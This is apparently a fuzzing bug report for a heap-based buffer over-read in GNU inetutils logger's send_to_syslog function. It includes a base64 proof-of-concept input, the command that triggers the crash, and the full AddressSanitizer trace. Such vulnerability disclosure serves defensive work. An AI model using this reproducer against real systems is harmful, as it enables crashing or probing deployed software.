# Heap-based Buffer Overflow in logger

## Description

Heap-based Buffer Overflow in logger at inetutils/src/logger.c:329

**version**

```
./logger --version
logger (GNU inetutils) 2.2.16-cf091
Copyright (C) 2021 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <https://gnu.org/licenses/gpl.html>.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

Written by Sergey Poznyakoff.
```

**System information**
Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz

**poc**

```
base64 poc
ZYdn/3JycmMjY2NPcnJjI2NjTwCAAAoAAIAAAABECm5vjAB9UQpubm9ybREqGzZNaYSEKhs2TWmE
hHY=
```

**command**

```
./logger -s < ./poc
```

**Result**

```
./logger -s < ./poc
e�g�rrrc#ccOrrc#ccO
=================================================================
==4156==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60c00000003f at pc 0x0000004c679b bp 0x7ffe5f3b7250 sp 0x7ffe5f3b7248
READ of size 1 at 0x60c00000003f thread T0
    #0 0x4c679a in send_to_syslog /root/disk2/fuzzing/inetutils/inetutils/src/logger.c:329:11
    #1 0x4c5cf2 in main /root/disk2/fuzzing/inetutils/inetutils/src/logger.c:511:2
    #2 0x7fa5804200b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #3 0x41c46d in _start (/root/disk2/fuzzing/inetutils/fuzz/bin/logger+0x41c46d)

0x60c00000003f is located 1 bytes to the left of 120-byte region [0x60c000000040,0x60c0000000b8)
allocated by thread T0 here:
    #0 0x494bad in malloc (/root/disk2/fuzzing/inetutils/fuzz/bin/logger+0x494bad)
    #1 0x7fa58047f6c3 in getdelim /build/glibc-eX1tMB/glibc-2.31/libio/iogetdelim.c:62:27
    #2 0x8000000000000005  (<unknown module>)

SUMMARY: AddressSanitizer: heap-buffer-overflow /root/disk2/fuzzing/inetutils/inetutils/src/logger.c:329:11 in send_to_syslog
Shadow bytes around the buggy address:
  0x0c187fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c187fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c187fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c187fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c187fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c187fff8000: fa fa fa fa fa fa fa[fa]00 00 00 00 00 00 00 00
  0x0c187fff8010: 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa fa
  0x0c187fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c187fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c187fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c187fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==4156==ABORTING
```